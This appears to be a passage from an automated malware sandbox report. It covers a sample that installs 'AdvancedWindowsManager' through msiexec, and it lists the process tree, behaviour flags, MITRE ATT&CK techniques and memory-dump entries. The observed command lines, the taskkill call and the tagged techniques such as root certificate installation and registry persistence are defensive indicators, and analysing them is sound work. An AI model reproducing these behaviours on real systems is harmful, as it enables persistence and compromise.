1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding DCADC1DE714E03277D81DFBAD02E8559 C
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:1108
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 71DB86C4F55524A76312D0918EE9816C
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:1320
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D07B761C8FFC99D9B2186E8931BBDCD7 M Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:1148

C:\Windows\system32\taskeng.exe
taskeng.exe {C78CA84D-10D3-476E-853E-7EDD5FB3E37F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:2648
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2712
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2736
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2772
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2760
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
  2⤵
  - Executes dropped EXE
  PID:4204
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
  2⤵
  - Executes dropped EXE
  PID:5852

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1328-90-0x000007FEFC521000-0x000007FEFC523000-memory.dmp

Filesize
8KB

Download
memory/1784-89-0x0000000000400000-0x0000000002B5E000-memory.dmp

Filesize
39.4MB

Download
memory/1784-88-0x0000000000220000-0x0000000000268000-memory.dmp

Filesize
288KB

Download
memory/1800-71-0x00000000002E0000-0x00000000002E1000-memory.dmp

Filesize
4KB

Download
memory/1800-70-0x0000000000400000-0x00000000019C2000-memory.dmp

Filesize
21.8MB

Download
memory/1800-73-0x0000000005450000-0x0000000005452000-memory.dmp

Filesize
8KB

Download
memory/1948-63-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1948-64-0x0000000075151000-0x0000000075153000-memory.dmp

Filesize
8KB

Download
memory/1992-62-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1992-53-0x0000000076A81000-0x0000000076A83000-memory.dmp

Filesize
8KB

Download
memory/2028-86-0x0000000000220000-0x0000000000277000-memory.dmp

Filesize
348KB

Download
memory/2608-159-0x000000002D000000-0x000000002D001000-memory.dmp

Filesize
4KB

Download
memory/2608-163-0x0000000036000000-0x0000000036001000-memory.dmp

Filesize
4KB

Download
memory/2608-162-0x0000000035700000-0x0000000035701000-memory.dmp

Filesize
4KB

Download
memory/2608-161-0x0000000007D00000-0x0000000007D01000-memory.dmp

Filesize
4KB

Download
memory/2608-160-0x000000002C600000-0x000000002C601000-memory.dmp

Filesize
4KB

Download
memory/2608-158-0x000000003D700000-0x000000003D701000-memory.dmp

Filesize
4KB

Download
memory/2788-180-0x0000000000400000-0x0000000002BBA000-memory.dmp

Filesize
39.7MB

Download
memory/2788-179-0x00000000043A0000-0x000000000448B000-memory.dmp

Filesize
940KB

Download
memory/2856-182-0x0000000000710000-0x000000000072C000-memory.dmp

Filesize
112KB

Download
memory/2856-176-0x0000000001330000-0x0000000001331000-memory.dmp

Filesize
4KB

Download
memory/2856-181-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

Filesize
4KB

Download
memory/3028-185-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/3028-190-0x00000000012D5000-0x00000000012E6000-memory.dmp

Filesize
68KB

Download
memory/3028-189-0x00000000012D0000-0x00000000012D1000-memory.dmp

Filesize
4KB

Download
memory/3028-187-0x0000000000470000-0x0000000000471000-memory.dmp

Filesize
4KB

Download
memory/3028-183-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download